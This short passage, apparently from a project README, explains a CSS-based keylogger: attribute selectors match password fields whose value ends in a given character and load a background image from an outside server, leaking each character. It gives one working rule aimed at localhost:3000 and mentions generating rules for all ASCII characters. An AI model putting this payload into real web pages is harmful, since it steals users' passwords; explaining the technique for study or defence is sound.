#How it works This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.
For example, the following css will select all input's with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.
input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } Using a simple script one can create a css file that will send a custom request for every ASCII character.